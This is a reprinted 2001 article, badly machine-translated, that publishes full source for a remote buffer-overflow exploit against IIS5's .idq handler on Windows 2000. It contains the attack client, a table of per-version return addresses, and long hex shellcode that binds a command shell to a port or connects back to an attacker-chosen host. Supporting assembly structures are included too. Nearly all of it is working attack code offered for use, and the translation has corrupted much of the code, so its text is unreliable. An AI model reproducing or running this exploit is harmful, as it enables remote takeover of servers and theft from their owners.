IIS5_IDQ command line overflow program source code - Snake
Creation Time: 2001-07-31 Article Properties: Reprinted article Source: http://snake12.top263.net article Submit: Inburst (Inburst_AT_263.NET) Snake's IIS5_IDQ command line overflow program source code BY snake. 2001/7/31 IIS5_IDQ overflow. . . From the Internet, I also let him return to the Internet. File Structure: CPP file: Iisidqoverflow.cpp and Skshellcodefunc.cpp header file: Skshellcodefunc.h function file: wsastart.cpp and snakesocket.cpp wsastart.h snakesocket.h (this 4 files do not provide ... Because they implemented only WSAStart and socket features, you have to successfully compile this program, you must replace the code of the related WSAStart and socket feature. This declaration!) Intermediate file: IIS_IDQ.ASM - - Used to implement the file of shellcode data, when compiling, it is not necessary to compile, just generate ShellCode data in the middle. It has been overflow, the process processing: Create a process and bind a port.
This can also be used for other Windows overflows. File 1: Iisidqoverflow.cpp (main file) #include
} Dwip = snakesocket.getHostAddr (Argv [2]); if (dwip == 0) {printf ("Input Address is not right ./n"); return 0;} SK_CONNECTTYPE ConnectType; ConnectStructStruct; char Szcommand [129] = "cmd.exe / c dir c: //"; BOOL bInputCommand = false; connectType = (Sk_ConnectType) atoi (argv [4]); connectStruct.byConnectType = connectType; switch (connectType) {case LISTEN_ON_PORT: connectStruct.wListenPort = ATOI (Argv [5]); if (argc> = 7) {binputcommand = true;} Break; Case Connect_to_host: IF (Argc <6) {printf ("Parameter is not enough ./n"); Return 0; } connectStruct.dwConnectIP = snakeSocket.GetHostAddr (argv [5]); connectStruct.wConnectPort = atoi (argv [6]); if (argc> = 8) {bInputCommand = true;} break; default: printf ( "overflow type is not Correct ./R/N "); return 0;}}} {Printf (" / r / n Please enter the bound command: "); scanf ("% s ", szcommand;} snakesocket.createsocket ); WPORT = ATOI (Argv [3]); if (! Snakesocket.connect (argv [2], wport)) {printf ("Connection destination machine% S:% D failed ./R/N", Argv [2], WPORT; RETURN 0; Else Printf ("Connection destination machine% s:% d ok./r/N", Argv [2], WPORT); BOOL BVALUE = SendidqExPloit (SnakesoCket.m_socket, SystemType , & connectstruct, szcommand; if (BValue) {Printf ("Send Shellcode to% S:% D OK / R / N", Argv [2], WPORT); Printf ("Now, if the system type is correct, and the vulnerability exists So, you should get [% s] result ..., good luck.! ", Szcommand;} else {printf (" Send Failure, the other system type does not support / r / n ");} snakesocket.closesoSocket (); Rustart.cleanup (); return 0;} file 2. SKSHELLCODEFUNC.CPP (filed by SHELLCODEFUNC.CPP // SHELLCODEFUNC.CPP // SHELLCODE Function // Start by Snake. 2001/7/11 # include
#include "SkShellCodeFunc.h" // search JUMP_EBX address WORD Search_Jump_Ebx_Code (DWORD * dwArray, WORD wMaxCount); static const char szSystemName [MAX_SYSTEM_TYPE_NUM 1] [60] = { "IIS5 Chinese Win2k Sp0", "IIS5 Chinese Win2k Sp1 "" IIS5 Chinese Win2k SP2 "," IIS5 ENGLISH WIN2K SP1 "," IIS5 ENGLISH WIN2K SP2 "," IIS5 Japanese Win2k SP0 "," IIS5 Japanese Win2k SP1 "," --IS5 JAPANESE WIN2K SP2 "," IIS5 Mexico Win2k "," --iis5 Mexico Win2k SP1 "," IIS5 Mexico Win2k SP2 "," Unknown .. ",}; // Get a system name .lpctstr getSystemName (System_Type Type ) {if (type> MAX_SYSTEM_TYPE_NUM) type = MAX_SYSTEM_TYPE_NUM; return szSystemName [type];} typedef struct _Call_Func_Addr {DWORD dwGetModuleHandle; DWORD dwGetProcAddress; DWORD dwRetJmpEbxAddr;} Call_Func_Addr; // 2 address function (barrier address system has nowhere ) static const Call_Func_Addr AllSystemFuncAddr [MAX_SYSTEM_TYPE_NUM] = {{0x77e756db, 0x77e7564b, 0x77e4ac97}, // IIS5_WIN2K_CHINESE_SP0 {0x77e6380e, 0x77e67031, 0x77E4BF17}, // IIS5_WIN2K_CHINESE_SP1 {0x77e66c42, 0x77e69ac1, 0x77 e4ac97}, // IIS5_WIN2K_CHINESE_SP2 {0x77E956DB, 0x77E9564B, 0x77E6F533}, // IIS5_WIN2K_ENGLISH_SP0 {0x77E8380E, 0x77E87031, 0x77E6E52B}, // IIS5_WIN2K_ENGLISH_SP1 {0, 0}, // IIS5_WIN2K_ENGLISH_SP2 {0x77E656DB, 0x77E6564B, 0x77E3AF17}, // IIS5_WIN2K_JAPANESE_SP0, { 0x77E5380E, 0x77E57031, 0x77E3BCAF}, // IIS5_WIN2K_JAPANESE_SP1, {0, 0}, // IIS5_WIN2K_JAPANESE_SP2, {0x77E956DB, 0x77E9564B, 0x77E596D2}, // IIS_WIN2K_MEXICO_SP0, {0, 0, 0}, // IIS_WIN2K_MEXICO_SP0, {0, 0, 0}, // IIS_WIN2K_MEXICO_SP0,}; // The following #define code is analyzed from ISNO's article,
Thanks isno. # Define IIS5_IDQ_EXCEPTION_OFFSET 234 / * Exception Handler Offset * / Static Unsigned CHAR ForwardJump [] = "% U08EB"; / * This is a JMP 08H that covers an exception structure, which is used to jump to the number of SHELLCODE * / static unsigned char jump_to_shell [] = "% UC033% UB866% UC31F% U0340% U8BD8% U8B03" "% U6840% UDB33% U30B3% UC303% UE0FF"; / * Jump to shellcode, I explained the explanation of not a sentence If you are interested, you can see yourself, pay attention to each byte, the% UC033 becomes / x33 / xc0 after the conversion.
* / / The following data can bind the shell to a port, and listen to .char szsnakebindshellcode [] = "/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / X90 / X90 / X90 / X90 / X90 / X90 / X90 / X90 / X90 "" / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 " "/ X55 / XC0 / X40 / XC1 / XE0 / X0B / X2B / XE0 / XEB / X03 / X90 / XEB / X4E / XE8 / XF9 / XFF / XFF / XFF / X55 / X8B / XEC / X57 / X51 / X50 / X52 / X8B / X7D / X08 / X8B / X45 / X10 / X8B / X55 / X14 / XF2 / XAE / X67 / XE3 / X06 / X4F / X88 / X17 / X41 / XEB / XF5 / X5A / X58 / X59 / X5F / X51 / X52 / X33 / XD2 / X50 / X5B / XC1 / XEB / X10 / X50 / X59 / X80 / XFF / X01 / X74 / X02 / XFE / XCB / X8A / XC3 "" / X85 / XD2 / X75 / X08 / XC1 / XE0 / X08 / X51 / X5B / X59 / XEB / XEB / X5A / X59 / X5B / XC3 / XEB / X4F / X55 / X8B / XEC / X56 / X57 / X52 / X51 / X53 / X50 / X8B / X7D / X08 / X8B / X75 / X33 / XC9 / XB1 / X80 / X03 / XF1 / X8A / X0E / X46 / X51 / X8A / X1E / X46 / X56 / X8B / X45 / X10 / XFF / XD0 / XC9 / X8A / X0E / X46 / X51 / X8A / X1E / X46 / X50 / X56 / X56 / X50 / X8B / X4D / X14 / X07 / X83 / XC7 "" / X04 / X5E / X58 / X03 / XF3 / X59 / XE2 / XE7 / X59 / XE2 / XD3 / X58 / X5B / X59 / X5A / X5F / X5E / X5D / XC3 / XEB / X7C / X55 / XC0 / X66 / XB8 / XF0 / X03 / X2B / XE0 / X56 / X57 / X52 / X51 / X08 / X8D / XBD / XC0 / XFC / XFF / XFF / X33 / XC0 / XB0 / X02 / X46 / X54 / XFF / XD0 / X33 / XC0 / X50 / X40 / X50 / X40 / X50 / X8B / X46 / X38 / XFF / XD0 / X8B / X55 / X0C / X8D / X1A / X8A / X0B / X50 / X8D "" / XBD / X10 / XFF / XFF / XFF / X8D / X1F / X33 / XC0 / XB0 / X02 / X66 / x89 / x03 / x58 / x80 / x01 / x75 / x69 / x50 / x50 / x8b / x42 / x04 / Xe8 / x31 / XFF / XFF / XFF / X8B / XC8 / X86 / XE9 / X58 / X8D / X5F / x02 / x8b / x55 / x0c / x33 / xc0 / x8d / x5f / x04 / x89 / x03 / x58 / x50 / x33 / xc9 / xb1 / x10 / x51 / x57 / x50 / x8b / x46 / X3C / XFF / XD0 / XEB / X02 / XEB / X4D / X58 / X50 / X33 / XC9 / X41 / X51 / X50 / X8B / X46 ""
/ X40 / XFF / XD0 / X58 / X50 / X33 / XC9 / XB1 / X10 / X8D / XBD / X40 / XFF / XFF / XFF / X89 / X0F / X57 / X8D / XBD / X10 / XFF / XFF / XFF / X57 / x50 / x8b / x46 / x44 / x52 / x8b / x46 / x58 / x53 / xd0 / x58 / x83 / xf8 / xff / x74 / x7a / x-x, x53 / x50 / x8b / x42 / X10 / XE8 / XC9 / XFE / XFF / XFF / X8B / XC8 / X86 / XE9 / X8D / X5F / X02 / XEB / X02 / XEB / X6A / X8B / X42 / X08 / XE8 / XB3 / XFE / XFF / XFF "/ x8b / xc8 / xc1 / xe1 / x10 / x8b / x42 / x0c / xe8 / xa6 / xfE / XFF / XFF / X66 / X8B / XC8 / X8D / X5F / X04 / X89 / X0B / x58 / x50 / x33 / x51 / x57 / x50 / x8b / x46 / x5c / xff / xd0 / x8b / xc8 / x58 / x67 / XE3 / X0B / X90 / X50 / x8b / x46 / x58 / XFF / XD0 / X33 / XC0 / XEB / X25 / X50 / X50 / X5A / X8D / XBD / X10 / XFF / XFF / XFF / X33 / XC0 / XB0 / X01 / X89 / X07 / XC1 / XE0 / X02 / X50 / x57 / x66 / x50 / x06 / x10 / x50 / x66 "" / x52 / x8b / x46 / x50 / XFF / XD0 / X58 / X5B / X59 / X5A / X5F / X5E / X8B / XE5 / X5D / XC3 / XEB / X62 / X55 / XEB / XEC / X57 / X56 / X52 / X51 / X7D / X0C / X57 / X5A / X33 / XC0 / X8D / X7F / X24 / X57 / X33 / XC9 / XB1 / X44 / XF3 / XAA / X5F / X8D / X37 / XB1 / X44 / X89 / X0E / X8D / X77 / X2C / X66 / XB9 / X01 / X01 / X89 / X0E / X57 / X8D / X7F / x38 / x8d / x72 / x89 / x07 / x5f / x57 / x8d "" / x7f / x3c / x8d / x72 / x04 / x8b / x06 / x89 / x07 / x5f / x8b / x75 / x08 / x8b / x 46 / X30 / XC9 / X51 / X41 / X51 / X41 / X51 / X8D / X57 / X40 / X52 / X50 / X0C / X8D / X76 / X04 / X8B / X1E / X5E / XEB / X02 / XEB / X42 / X46 / X2C / XFF / XD0 / X33 / XC0 / X8B / X7D / X0C / X8D / X57 / X14 / X52 / X8D / X57 / X24 / X52 / X50 / x50 / x50 / x40 / x50 / x48 / x50 / x50 / x8b / x55 / x10 / x52 / x50 / x8b "" / x46 / x0c / xff / xd0 / x8b / x47 / x0c / x50 / x8b / x46 / X34 / XFF / XD0 / X8B / X47 / X04 / X34 / XFF / XD0 / X58 / X5B / X59 / X5A / X5E / X5F / X8B / XE5 / X5D / XC3 / XEB / X33 / X55 / X8B / XEC / X56 / X57 / X52 / X51 / X53 / X08 / X8B / X7D / X0C / X8B / X47 / X10 / X50 / X8B / 
X46 / X58 / XFF / XD0 / X8B / X07 / X50 / X8B / X46 / X34 / XFF / XD0 / X5B / X47 / X08 / X50 / X8B / X46 / X34 / XFF / XD0 / X58 / X5B / X59 ""
/ X5A / X5F / X5E / X8B / XE5 / X5D / XC3 / XEB / X77 / X55 / X8B / XEC / XB8 / XF0 / X02 / X2B / XE0 / X56 / X57 / X52 / X51 / X53 / x8b / x75 / x08 / x8b / x7d / x0c / x8d / x55 / x40 / x89 / x02 / x8d / x55 / xf8 / x8b / x02 / x85 / xc0 / x74 / x2a / x33 / xc0 / X50 / XB0 / XF0 / X50 / X8D / X85 / X08 / XFF / XFF / XFF / X50 / X8D / X5F / X10 / X8B / X03 / X50 / X8B / X46 / X4C / XFF / XD0 / X83 / XF8 / XFF / x75 / x0f / x50 "" / x5a / x8b / x46 / x28 / x28 / x27 / x74 / x28 / Xeb / x7f / x85 / xc0 / x20 / x7b / x7e / x20 / x33 / xd2 / x52 / x8d / x5d / xfc / x53 / x50 / x8d / x9d / x08 / x8b / x47 / x08 / x50 / x8b / x46 / x18 / xff / xd0 / x85 / xc0 / X74 / XEB / XEB / X02 / XEB / X62 / X33 / XC0 / X50 / X8D / X55 / XFC / X52 / X50 / X50 / X50 / X8B / X46 / X10 / XFF / XD0 / X8B / x45 / x74 / x3b / x33 "" / xc0 / x50 / x8d / x55 / xfc / x52 / xb0 / xf0 / x50 / x8d / x95 / X08 / XFF / XFF / XFF / X52 / X8B / x07 / x50 / x8b / x46 / x1c / xc0 / x74 / x23 / x33 / xc0 / x50 / x8b / x45 / xfc / x50 / x8d / x95 / x08 / XFF / XFF / XFF / X52 / x8b / x47 / x10 / x50 / x8b / x46 / x48 / xff / xd0 / x83 / xf8 / XFF / X74 / X07 / XEB / XAC / XE9 / X4C / XFF / XFF / XFF / X5B / X59 / X5A / X5F / X5E / X8B / XE5 / X5D / XC3 / XEB / X72 / X55 / X8B / XEC / X33 "" / XC0 / XB0 / XF0 / X2B / XE0 / X56 / X57 / X52 / X51 / X53 / X8B / X75 / X08 / x8b / x 7D / X0C / X33 / XDB / X8D / X7D / XF0 / X8D / X57 / X04 / X89 / X1A / X8D / X57 / X08 / X43 / X89 / X1A / X8D / X17 / XB3 / X0C / X89 / X1A / X33 / XDB / X57 / X53 / X57 / X8B / X7D / X0C / X8D / X57 / X04 / X89 / X1A / X52 / X8D / X17 / X52 / X8B / X46 / X04 / XFF / XD0 / X5F / X85 / XC0 / X74 / X1F / X33 / XDB / X53 / X57 / X8B / X7D / X0C / X8D / X57 / X08 / X52 / X8D / X57 "" "/ x0c / x89 / x1a / x52 / x8b / x46 / x04 / xff / xd0 / x85 / XC0 / X74 / X05 / X33 / XC0 / X40 / XEB / X05 / X33 / XC0 / XEB / X01 / X90 / X5B / X59 / X5A / X5F / X5E / X8B / XE5 / X5D / XC3 / X8D / X34 / X24 / X8B / X36 / X33 / XC9 / X66 / XB9 / XCC 
/ X04 / X03 / XF1 / X8D / XBD / X30 / XFE / XFF / XFF / X57 / X66 / XB9 / XFA / X01 / XF3 / XA4 / X5F / X57 / X33 / XC9 / X51 / XB1 / X2B / X51 / X66 / XB9 / XE6 / X01 / X51 / X33 / XDB / XB3 / X14 / X03 / XFB / X57 ""
/ XE8 / XCC / XFB / XFF / XFF / X83 / XC9 / X10 / X33 / XDD / X01 / X8B / XF7 / X03 / XF1 / X8B / X46 / X04 / X50 / X8B / X06 / X50 / X57 / X8D / XB5 / X30 / XFD / XFF / XFF / X56 / XE8 / XF6 / XFB / XFF / XFF / X83 / XC4 / X10 / X5F / X57 / X56 / XE8 / X3C / XFC / XFF / XFF / X83 / XC4 / X08 / X85 / XC0 / X74 / X57 / X8D / XBD / X10 / XFC / XFF / XFF / X89 / X03 / X57 / X56 / XE8 / X16 / XFF / XFF / XFF / X83 / xc4 / x08 / x85 "" / xc0 / x74 / x3e / x8d / xbd / x30 / xfe / xff / xff / x33 / xc0 / xb0 / x14 / x03 / xf8 / x57 / x8d / XBD / X10 / XFC / XFF / XFF / X57 / X56 / XE8 / X3B / XFD / XFF / XFF / X83 / XC4 / X0C / X57 / XFE / XE8 / X0E / XFE / XFF / XFF / X83 / XC4 / X08 / X57 / X56 / XE8 / XCF / XFD / XFF / XFF / X83 / XC4 / X08 / X33 / XC0 / X50 / X8D / X02 / X50 / X8B / X06 / XFF / XD0 / X33 / XC0 / X50 / X8B / X46 / X24 / XFF / XD0 / XC3 / X8B / XE5 / X5D / X90 "" / X90 / X02 / XFF / XFF / X02 / X01 / X02 / X25 / X01 / XC0 / X01 / XA8 / X01 / x58 / x01 / x01 / x02 / x63 / x65 / x78 / x65 / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b "" / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x 2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X2B / X02 / X0E / X6B / X65 "" / x6c / x33 / x32 / x2e / x64 / x6c / x6c / x2b / x2b / x0e / X11 / x54 / x69 / x6e / x61 / x74 / x65 / x50 / x72 / x6f / x63 / x65 / x73 / x73 / x2b / x0b / x43 / x72 / x65 / x61 / x74 / x65 / X50 / x69 / x70 / x47 / x65 / x74 / x53 / x74 / x61 / x72 / x49 / x6e / x66 / x6f / x41 / x2b / x0f / x43 / x72 / X65 / X61 / X72 / X6F / X63 / X65 / X73 / X73 / X41 / X2B / X0E 
/ X50 / X65 / X65 / X6B ""
/ X4E / X61 / X6D / X65 / X70 / X65 / X2B / X0C / X47 / X6C / X6F / X62 / X61 / X6C / X41 / X6C / X6C / X6F / X63 / X2B / X0B / X57 / x72 / x69 / x74 / x65 / x46 / x69 / x6c / x09 / x52 / x65 / x61 / x64 / x46 / x69 / x6c / x53 / x6c / x65 / x65 / x70 / x78 / x69 / x74 / x50 / x72 / x73 / x73 / x2b / x0e / x47 / x65 / x74 / x4c / x61 / x73 / x74 / x45 / x72 / x72 / x6f / x72 "" / x2b / x2b / x10 / x44 / x75 / x63 / x61 / x74 / x65 / x48 / x61 / x6e / x64 / x6c / x65 / x2b / x12 / x47 / x65 / x74 / x43 / x75 / x72 / x72 / x50 / x72 / x6f / x63 / x65 / x73 / x73 / x2b / x0c / x43 / x6c / x6f / x73 / x65 / x48 / x61 / x6e / x64 / x6c / x65 / x2b / x32 / x5f / x33 / x32 / x2e / x64 / x6c / x6c / x2b / x0b / x07 / x73 / x6f / x63 / x6b / x65 / x74 / x2b / x05 / x62 / x69 / x6e / x64 / x2b "" / x07 / x6c / x69 / x73 / x2b / x07 / x61 / x63 / x63 / x65 / x70 / x74 / x2b / x05 / x73 / x65 / x6e / x72 / x65 / x63 / x76 / x2b / x0b / x73 / x65 / x74 / x73 / x6f / x63 / x6b / x6f / x70 / x74 / x2b / x0b / x57 / x53 / x41 / x72 / x74 / x75 / x72 / x2b / x0c / x63 / x6c / x6f / x73 / x65 / x73 / x6f / x63 / x6b / x65 / x74 / x2b / x08 / x63 / X6F / X6E / X6E / X65 / X63 / X74 / X2B / X0C / X67 / X65 / X74 "" / x68 / x6f / x73 / x74 / x6e / x61 / x6d / x65 / x2b / x2b / x2b / x2b / x2b / x2b / x 2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / x2b / xdb / x56 / x-x2b / xdb / x56 / x-x2b / x77 / x4b / x56 / x-x7 / x77 / x00 " ; // my private information: static const char szSnakeSign [] = "snake_program_code_v2.0"; # define PREHEAD_NOP_SIZE 0x24 # define dwConnectType_Offset 1249 PREHEAD_NOP_SIZE # define dwListenPort_Offset 1253 PREHEAD_NOP_SIZE # define dwConnectIP1_Offset 1257 PREHEAD_NOP_SIZE # define dwConnectIP2_Offset 1261 PREHEAD_NOP_SIZE # define dwConnectPort_Offset 1265 PREHEAD_NOP_SIZE # define dwExecCommand_Offset 1269 PREHEAD_NOP_SIZE # define wExecCommandSize 128 # define dwGetModuleHandle_Offset 1746 PREHEAD_NOP_SIZE # define 
dwGetProcAddress_Offset 1750 PREHEAD_NOP_SIZEBYTE byReservedValue [] = {0, 0x0a, 0x0d} ;;
// Conversion Standard Word -> Snake Shellcode Reserve Value.; // This Byte == 0, 0x0a, 0x0d, then, the high is 2. Low 1.; // High is 1, the low position is unchanged .dword conveute_mansi_word_to_sk_long (Word wValue) {int iReservCount, i; WORD wTemp; DWORD dwRetValue = 0; BOOL bFirst = true; iReservCount = sizeof (byReservedValue) / sizeof (BYTE); while (1) {wTemp = wValue & 0xff00; wTemp >> = 8; for ( i = 0; I case IIS5_WIN2K_JAPANESE_SP0: wSelectValue = IIS5_WIN2K_JAPANESE_SP0; break; case IIS5_WIN2K_JAPANESE_SP1: wSelectValue = IIS5_WIN2K_JAPANESE_SP1; break; case IIS5_WIN2K_JAPANESE_SP2: wSelectValue = IIS5_WIN2K_JAPANESE_SP2; break; case IIS_WIN2K_MEXICO_SP0: wSelectValue = IIS_WIN2K_MEXICO_SP0; break; case IIS_WIN2K_MEXICO_SP1: wSelectValue = IIS_WIN2K_MEXICO_SP1; break; case IIS_WIN2K_MEXICO_SP2: wSelectValue = IIS_WIN2K_MEXICO_SP2; break; default: break;} if (wSelectValue> = MAX_SYSTEM_TYPE_NUM) return 0; dwGetModuleHandle = AllSystemFuncAddr [wSelectValue] .dwGetModuleHandle; dwGetProcAddress = AllSystemFuncAddr [wSelectValue] .dwGetProcAddress; dwRetJmpEbx = AllSystemFuncAddr [wSelectValue] .dwRetJmpEbxAddr; if (dwGetModuleHandle = = 0) RETURN 0; MEMSET (SZBUF, 1, SIZEOF (SZBUF)); Memcpy (SZSNAKESIGN); P = & (SZBUF [IIS5_IDQ_EXCEPTION_OFFSET-2]); WSPrintf (p, "% s" , forwardjump); P = Strlen ((char *) Forwardjump ); * P = 1; * p = 'u'; WSPrintf (p, "% 04x", (dwretjmpebx >> 0) & 0xfff); p = 4; * p = ' % '; * P =' u '; WSPrintf (p, "% 04x", (dwretjmpebx >> 16) & 0xfff); P = 4; * p = 1; WSPrintf (p, "% s", jump_to_shell ); // wsprintf (szoutput, "get /n.idq?%S=b http / 1.0 / r / nshell:% S / R / N / R / N", SZBUF, SZMYCODE); WSPRINTF (Szoutput, "Get /N.IDQ?%S=b http / 1.0 / r / nsnake: ", szbuf); Memcpy (Szcreatecode, SzsnakeBindshellcode, sizeof (szsnakebindshellcode); // address information, port information writing shellcode of DWORD * pdw, dwTemp; WORD wTemp; char * lpsz, szExecTemp [wExecCommandSize]; // Init Value switch (pConnectStruct-> 
byConnectType) {case LISTEN_ON_PORT:.. SzCreateCode [dwConnectType_Offset ] = LISTEN_ON_PORT; dwTemp = Convert_Ansi_Word_To_Sk_Long (pConnectStruct-> wListenPort); lpsz = & (szCreateCode [dwListenPort_Offset]); pdw = (DWORD *) lpsz; * pdw = dwTemp; // set listen port break; case CONNECT_TO_HOST:. szCreateCode [ dwConnectType_Offset] = CONNECT_TO_HOST; wTemp = (WORD) ((pConnectStruct-> dwConnectIP) & 0xffff); dwTemp = Convert_Ansi_Word_To_Sk_Long (wTemp); lpsz = & (szCreateCode [dwConnectIP2_Offset]); pdw = (DWORD *) lpsz; * pdw = dwTemp ;. // set IP1 wTemp = (WORD) (((pConnectStruct-> dwConnectIP) & 0xffff0000) >> 16); dwTemp = Convert_Ansi_Word_To_Sk_Long (wTemp); lpsz = & (szCreateCode [dwConnectIP1_Offset]); pdw = (DWORD *) LPSZ; * PDW = dwtemp; // set ip2. dwtemp = communication_nsi_word_to_sk_long (PConn ectStruct-> wConnectPort); lpsz = & (szCreateCode [dwConnectPort_Offset]); pdw = (DWORD *) lpsz; * pdw = dwTemp; // set connect Port break; default:. return 0;} lpsz = & (szCreateCode [dwGetModuleHandle_Offset ]); pdw = (DWORD *) lpsz; * pdw = dwGetModuleHandle; // set dwGetModuleHandle lpsz = & (szCreateCode [dwGetProcAddress_Offset]);. pdw = (DWORD *) lpsz; * pdw = dwGetProcAddress; // set dwGetProcAddress memset. 
(szexectemp, ' ', wexeccommandsize; wtemp = strlen (lpszbindcmd); if (wtemp> = wexeccommandsize) wtemp = wexeccommandsize-1; strncpy (szExecTemp, lpszBindCmd, wTemp); lpsz = & (szCreateCode [dwExecCommand_Offset]); memcpy (lpsz, szExecTemp, wExecCommandSize); strcat (szOutput, szCreateCode); strcat (szOutput, "/ r / n / r / n") ; strcpy (pszOutput, szOutput); return strlen (pszOutput);} // address information needed to achieve void GetNecesProcAddr (char * szInfo, int iMaxSize) {HANDLE hModule = GetModuleHandle ( "kernel32"); DWORD dwAddr_GetHandle, dwAddr_GetProcAddr; char szOutput [ 11024], SZJMPADDR [8124], SZONE [20]; DWORD DWJMPEBX [100]; Word WgetjmpCount, W; WgetjmpCount = Search_jump_ebx_code (dwjmpebx, 100); SzjmpAddr [0] = 0; for (w = 0; w } PValue ;} return wCount;} file 3. SkShellCodeFunc.h - must header files //SkShellCodeFunc.h// header file for shellcode defined function // start by snake 2001/7/11 # ifndef _SNAKE_SHELLCODE_FUNC_HEADER_2001_7_11 # define _SNAKE_SHELLCODE_FUNC_HEADER_2001_7_11enum. sYSTEM_TYPE {IIS5_WIN2K_CHINESE_SP0, IIS5_WIN2K_CHINESE_SP1, IIS5_WIN2K_CHINESE_SP2, IIS5_WIN2K_ENGLISH_SP0, IIS5_WIN2K_ENGLISH_SP1, IIS5_WIN2K_ENGLISH_SP2, IIS5_WIN2K_JAPANESE_SP0, IIS5_WIN2K_JAPANESE_SP1, IIS5_WIN2K_JAPANESE_SP2, IIS_WIN2K_MEXICO_SP0, IIS_WIN2K_MEXICO_SP1, IIS_WIN2K_MEXICO_SP2, MAX_SYSTEM_TYPE_NUM,}; enum Sk_ConnectType {CONNECTTYPE_NONE = 0, LISTEN_ON_PORT = 1, CONNECT_TO_HOST, MAX_CONNECT_TYPE}; typedef struct _ConnectStruct { BYTE byConnectType; WORD wListenPort; DWORD dwConnectIP; WORD wConnectPort;} ConnectStruct; // get a system name .LPCTSTR GetSystemName (sYSTEM_TYPE type); # endif // _ SNAKE_SHELLCODE_FUNC_HEADER_2001_7_11 file 4.iis_idq.asm --shellcode assembly code (not compiled Need); // IIS5_IDQ.ASM .386p .Model flat, c; // Define connection information below Structure .stconnectinfo struct byconnecttype db 0; // = 1, listening; = 2, linking external IP / port. ByRESERV1 DB 1; // Nothing Just for Word Adjusted. 
DWRESERV1 DW 1; // Nothing Just for Word Adjusted. Dwlistenport DD 0; // DDWORD DWIP1 DWIP2; DWIP1 DD 0; // // IP and port, one use 2 bits. High position is type, low as value. DWIP2 DD 0; // 1. High = 1, low position ordinary value dwConnectPort dd 0; // 2. high = 2, should be low = value -1stConnectInfo ends; // use the function configuration SkOverflowFuncAddr struct TerminateProcess dd 0; CreatePipe dd 0; GetStartupInfoA dd 0; CreateProcessA dd 0; PeekNamedPipe dd 0; GlobalAlloc DD 0; WriteFile DD 0; ReadFile DD 0; Sleep DD 0; EXITPROCESS DD 0; GetLasTerror DD 0; DuplicateHandle DD 0; GetCurrentProcess DD 0; CloseHandle dd 0; socket dd 0; bind dd 0; listen dd 0; accept dd 0; send dd 0; recv dd 0; setsockopt dd 0; WSAStartup dd 0; closesocket dd 0; connect dd 0; gethostname dd 0; SkOverflowFuncAddr endsSTARTUPINFO struct cb dd 0; lpReserved dd 0; lpDesktop dd 0; lpTitle dd 0; dwX dd 0; dwY dd 0; dwXSize dd 0; dwYSize dd 0; dwXCountChars dd 0; dwYCountChars dd 0; dwFillAttribute dd 0; dwFlags dd 0; wShowWindow dw 0; cbReserved2 dw 0; lpReserved2 dd 0; hStdInput dd 0; hStdOutput dd 0; hStdError dd 0; STARTUPINFO endsPROCESS_INFORMATION struct hProcess dd 0; hThread dd 0; dwProcessId dd 0; dwThreadId dd 0; PROCESS_INFORMATION ends;; // sleeve - interactive command structure Shell_Cmd_Pipe struct hReadPipe dd 0; ShellStdoutPipe dd 0; hWritePipe dd 0; ShellStdinPipe dd 0; msocket dd 0; ProcessInformation PROCESS_INFORMATION <>; nstartupinfo STARTUPINFO <>; Shell_Cmd_Pipe endsSIZE_OF_TEMP_BUFF ER equ 0f0h; // accept write data shroud structure .Recv_Write_Socket_Pipe_Data struct szTemp db SIZE_OF_TEMP_BUFFER dup (0) dwBreak DD 0 dwTemp DD 0Recv_Write_Socket_Pipe_Data ends; SOCKADDR_IN struct sin_family dw 0; sin_port dw 0; sin_addr dd 0; sin_zero db 8 dup ( 0); SOCKADDR_IN endsSECURITY_ATTRIBUTES struct nLength DD 0; lpSecurityDescriptor DD 0; bInheritHandle DD 0; SECURITY_ATTRIBUTES ends; FUNC_PARAM_1 equ [ebp 8] FUNC_PARAM_2 equ [ebp 0ch] FUNC_PARAM_3 equ [ebp 10h] 
FUNC_PARAM_4 equ [ebp 14h] FUNC_PARAM_5 EQU [EBP 18H] FUNC_PARAM_6 EQU [EBP 1CH] FUNC_PARAM_7 EQU [EBP 20H] SO_RCVTIMEO EQU 1006H; // Receive Timeout SOL_Socket EQU 0FFFFH; // options for socket level Shell_Cmd_Pipe_OFFSET equ 3f0hSkOverflowFuncAddr_OFFSET equ 2d0hszShellNeedFunc_OFFSET equ 1d0h .code public _sk_Bind_ConnectShellCode public _GetDataSetOffset_Valuestart: _sk_Bind_ConnectShellCode proc push ebp; mov ebp, esp;; // generate stack space 0x800 of xor eax, eax; inc eax; shl eax,. 0BH; / / => 0x800 Sub ESP, EAX; JMP call_back; nop; jump_next: jmp run_Actual1; call_back: call jump_next; call_back_data_offset:; // jmp quit_return; // not run here as no necessary.;; // (void * ptr, int iLen, DWORD dwOld, DWORD dwNew) _Convert_Add_Sign_To_Null_Sign: push ebp; mov ebp, esp; push edi; push ecx; push eax; push edx; mov edi, FUNC_PARAM_1; // first parameter mov ecx, FUNC_PARAM_2;. // 2nd parameters. MOV EAX, FUNC_PARAM_3; // The third parameter. MOV EDX, FUNC_PARAM_4; // The 4th parameter.; // Repeat, replace until cx = 0NextAddsign: repnz scaSB; JCXZ Finish_Replace_Add_sign; Dec EDI; MOV BYTE PTR [EDI], DL; Inc ECX; JMP nextAddsign; Finish_ Replace_add_sign: POP EDX; POP EX; POP ECX; POP EDI; POP EBP; RET ;. / / Convert Eax's long-> AX standard word.; // rule: 1. High = 1, low is normal value.; / / 2. High = 2, low should = value -1_convert_sk_long_to_mansi_word: push ebx; push ecx; push edx; xor edx, edx; push eax; // low -> EBX POP EBX; SHR EBX, 10H; Push Eax; // high -> ecx pop ecx; _Convert_bx_To_al_Short:; // process ebx cmp bh, 1; je _convert_Sk_Long_IsNormal; dec bl; _convert_Sk_Long_IsNormal: mov al, bl; test edx, edx; jnz 